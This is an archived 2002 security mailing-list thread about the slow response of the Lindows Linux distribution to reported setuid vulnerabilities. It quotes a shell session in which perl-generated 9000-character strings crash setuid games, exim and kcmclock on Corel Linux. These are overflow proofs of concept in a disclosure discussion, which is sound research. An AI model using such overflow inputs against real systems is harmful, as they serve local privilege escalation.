Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Lindows Issues

From: KF <dotslash () snosoft com>
Date: Thu, 18 Jul 2002 13:22:22 -0400
I am a paying customer and unfortunately if you read their agreements I may be violating their wishes by publishing info like that. I may also loose my right to be a Lindows insider. This is also why the info that I have released I stressed the Xandros side of things and was not directly refrencing Lindows. The Xandros authors are quite quick to respond and infact told me that they also notified Lindows of the issues and recieved no response (several months ago). I did release a little advisory a while back... http://online.securityfocus.com/archive/1/274649 
=]
-KF



H C wrote:


KF,

Instead of saying that Lindows "SUCKS" w/ regards to
security responses, why don't you simply follow the
widely accepted vulnerability disclosure "methodology"
and write up an advisory?


--- KF <dotslash () snosoft com> wrote:


Yes... we found about 7 or 8 suids to be exploitable
in the default config (local only so not any real threat...I don't believe its supposed to be multi-user really)... they were reported to Lindows.com. Lindows is based on Xandros linux so you may find that auditing Xandros will reveal alot about Lindows. They (Lindows) SUCK on security type responses is all I know ... they NEVER really got back to me. They marked my case as "Solved" after they replyed "we will get back with you shortly"for the 2nd time. 

* Response (Evan)* 06/17/2002 10:15 AM
Thank you for the email. We are working on this and
will get back with you shortly. 
* Customer (Kevin Finisterre)* 06/17/2002 10:15 AM
I forwarded several security issues on to your staff
and only recieved
one reply... what is the status of these issues? *
Question Reference #020526-000013*

-KF

* Question Reference #020617-000051*
*Contact Information: * dotslash () snosoft com
*Date Created: * 06/17/2002 10:15 AM
*Last Updated: * 06/24/2002 04:08 PM
*Status: * Solved



elguapo25:/home/elguapo# uname -a
Linux elguapo25 2.2.16 #1 Tue Jul 18 16:07:55 EDT
2000 i686 unknown

elguapo25:/home/elguapo# cat /etc/issue
Corel LINUX 1.2 (\l)

elguapo25:/home/elguapo# cat /etc/motd
Linux elguapo25 2.2.16 #1 Tue Jul 18 16:07:55 EDT
2000 i686 unknown

Copyright (C) 1993-1999 Software in the Public
Interest, and others

Most of the programs included with the Debian
GNU/Linux system are
freely redistributable; the exact distribution terms
for each program
are described in the individual files in /usr/doc/
*/copyright

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY,
to the extent
permitted by applicable law.


elguapo25:~# /usr/games/xsok -xsokdir `perl -e
'print "A" x 9000'`
Segmentation fault

elguapo25:~# /usr/games/purity `perl -e 'print "A" x
9000'`
Segmentation fault


elguapo25:~# /usr/games/xgalaga -level `perl -e
'print "1" x 9000'`
xgal.sndsrv: Couldn't open DSP /dev/dsp
xgal.sndsrv: Sound not available
Segmentation fault

elguapo25:~# /usr/games/xpat2 -xpmdir `perl -e
'print "A" x 9000'`
FAILED to open keyboard file
"/usr/lib/games/xpat/C/keys"
Segmentation fault

elguapo25:~# /usr/sbin/exim -C `perl -e 'print "A" x
9000'`
Segmentation fault

elguapo25:~# export TZ=`perl -e 'print "A" x 9000'`
elguapo25:~# /usr/X11R6/bin/kcmclock
Segmentation fault

-KF


sec daddy wrote:


Has anyone done research on the security of
Lindows? 
There appear to be application level exploits with


MS


programs that run on Lindows, consistent with


Windows.


I'm more curious about O/S level exploits.

__________________________________________________
Do You Yahoo!?
Yahoo! Autos - Get free new car price quotes
http://autos.yahoo.com








__________________________________________________
Do You Yahoo!?
Yahoo! Autos - Get free new car price quotes
http://autos.yahoo.com
Previous By Date Next
Previous By Thread Next

Current thread: